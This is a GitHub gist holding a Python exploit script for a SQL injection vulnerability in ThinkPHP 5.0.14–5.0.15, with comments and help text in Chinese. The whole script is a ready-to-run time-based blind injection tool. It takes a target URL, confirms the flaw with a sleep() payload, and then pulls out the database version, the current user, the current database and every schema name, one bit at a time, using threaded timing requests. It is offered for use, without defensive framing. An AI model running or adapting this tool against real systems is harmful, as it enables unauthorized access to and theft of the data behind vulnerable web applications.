Skip to content

Instantly share code, notes, and snippets.

@imjdl
Created October 19, 2018 07:55
Show Gist options
  • Save imjdl/a6f086bb42a54fe4fd0e56525b8428a1 to your computer and use it in GitHub Desktop.
Save imjdl/a6f086bb42a54fe4fd0e56525b8428a1 to your computer and use it in GitHub Desktop.
ThinkPHP5.0.14-ThinkPHP5.0.15SQl注入漏洞exp
#!/usr/bin/env python3
# coding = UTF-8
import sys
import requests
import time
from threading import Thread
from threading import Lock
import argparse
lock = Lock()
res = {}
class ScanMoudle(object):
"""
-v 查看数据库版本
-user 当前用户
-database 当前数据库
--dbs 列出数据库
"""
def __init__(self, url):
self.url = url
# 检测漏洞是否存在
def verification(self):
url = self.url
print("\033[1;36;40m[!] 检测漏洞是否存在\033[0m")
url = url.format(payload="(select sleep(2))")
start_time = time.time()
requests.get(url=url, headers={"UserAgent": self.fake_agnet()})
end_time = time.time()
if end_time - start_time > 2:
print("\033[1;32;40m[+] 该地址存在漏洞!!!!\033[0m")
# print("\033[1;33;40m*"*20, "\033[0m")
else:
print("\033[1;31;40m[-] ERROR 漏洞不存在!!!\033[0m")
# 获取数据库版本信息
def get_version(self):
url = self.url
print("\033[1;36;40m[!] 获取数据库版本\033[0m")
payload_length = "(if(length(version()){0}{1},0,sleep(1)))"
length = self.get_length(url.format(payload=payload_length))
print("\n\033[1;36;40m[!] 数据库版本数据长度为%d\033[0m"%length)
payload = "(if(ascii(substr(version(), {index}, 1)) %26 {index2} = {index2}, 0, sleep(1)))"
self.get_res(url=url, payload=payload, length=length)
# 获取数据库当前用户
def get_user(self):
url = self.url
print("\033[1;36;40m[!] 获取数据库当前用户\033[0m")
payload_length = "(if(length(user()){0}{1},0,sleep(1)))"
length = self.get_length(url.format(payload=payload_length))
print("\n\033[1;36;40m[!] 数据库当前用户数据长度为%d\033[0m" % length)
payload = "(if(ascii(substr(user(), {index}, 1)) %26 {index2} = {index2}, 0, sleep(1)))"
self.get_res(url=url, payload=payload, length=length)
# 获取当前数据库
def get_database(self):
url = self.url
print("\033[1;36;40m[!] 获取当前数据库\033[0m")
payload_length = "(if(length(database()){0}{1},0,sleep(1)))"
length = self.get_length(url.format(payload=payload_length))
print("\n\033[1;36;40m[!] 当前数据库长度为%d\033[0m" % length)
payload = "(if(ascii(substr(database(), {index}, 1)) %26 {index2} = {index2}, 0, sleep(1)))"
self.get_res(url=url, payload=payload, length=length)
# 获取所有数据库
def get_dbs(self):
url = self.url
print("\033[1;36;40m[!] 获取所有数据库\033[0m")
payload_length = "(if((select count(SCHEMA_NAME) from information_schema.SCHEMATA){0}{1},0,sleep(1)))"
length = self.get_length(url.format(payload=payload_length))
print("\n\033[1;36;40m[!] 数据库个数为%d\033[0m" % length)
for d in range(length):
db_len_payload = "(if((select length(SCHEMA_NAME) from information_schema.SCHEMATA limit %d, 1){0}{1},0,sleep(1)))" % d
db_len = self.get_length(url=url.format(payload=db_len_payload))
print("\n\033[1;36;40m[!] 第%d个数据库的长度为%d\033[0m" % (d+1, db_len))
payload = "(if(ascii(substr((select SCHEMA_NAME from information_schema.SCHEMATA limit "+str(d) + \
", 1),{index}, 1)) %26 {index2} = {index2}, 0, sleep(1)))"
self.get_res(url=url, payload=payload, length=db_len)
# 获取查询的长度
def get_length(self, url, low=0, heigh=50):
medium = (heigh+low)//2
sys.stdout.write("\r\033[1;37;40mlow:%d medium:%d heigh:%d\033[0m" % (low, medium, heigh))
sys.stdout.flush()
if self.connect(url=url.format("=", medium)):
return medium
if self.connect(url=url.format(">", medium)):
return self.get_length(url=url, low=medium, heigh=heigh)
else:
return self.get_length(url=url, low=low, heigh=medium)
# 提取数据
def get_res(self, url, payload, length):
global res
self.raw_res = ""
for i in range(1, length+1):
sql_dict = self.make_sql(url=url, payload=payload, index=i)
self.connects(sql_dict)
self.raw_res += self.get_dict2val(res)
sys.stdout.write("\r\033[1;32;40m[+] [%d/%d]::%s\033[0m" % (i, length, self.raw_res))
sys.stdout.flush()
res = {}
print("\n", "\033[1;32;40m*"*20, "\033[0m")
# 产生SQL语句
def make_sql(self, url, payload, index=1):
sqls = {}
for i in ['128', '64', '32', '16', '8', '4', '2', '1']:
payload2 = payload.format(index=index, index2=i)
sql = url.format(payload=payload2)
sqls[i] = sql
return sqls
# 一此请求
def connect(self, url):
start_time = time.time()
requests.get(url=url, headers={"UserAgent": self.fake_agnet()})
end_time = time.time()
if end_time - start_time > 1:
return False
else:
return True
# 多次请求
def connects(self, sql_dict):
for key, val in sql_dict.items():
s = Scan(key, val)
s.start()
s.join()
def fake_agnet(self):
return 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36'
def get_dict2val(self, val):
keys = ["128", "64", "32", "16", "8", "4", "2", "1"]
res = ""
for key in keys:
res += str(val[key])
res = chr(int(res, base=2))
return res
class Scan(Thread):
def __init__(self, name, val):
Thread.__init__(self, name=name)
self.url = val
def run(self):
global lock, res
start_time = time.time()
requests.get(url=self.url, headers={"User-Agnet": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36"})
end_time = time.time()
if lock.acquire():
if end_time - start_time > 1:
res[self.name] = 0
else:
res[self.name] = 1
lock.release()
if __name__ == '__main__':
parser = argparse.ArgumentParser("ThinkPHP5SQL注入EXP")
parser.add_argument("-u", help="目标URL: http://ip/?a[0]=inc&a[1]={payload}&a[2]=1", required=True)
parser.add_argument("-v", help="列出数据库版本信息", action="store_true")
parser.add_argument("--user", help="列出当前数据库用户", action="store_true")
parser.add_argument("--database", help="列出当前使用的数据库", action="store_true")
parser.add_argument("--dbs", help="列出所有数据库信息", action="store_true")
args = parser.parse_args()
s = ScanMoudle(url=args.u)
s.verification()
if args.v:
s.get_version()
if args.user:
s.get_user()
if args.database:
s.get_database()
if args.dbs:
s.get_dbs()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment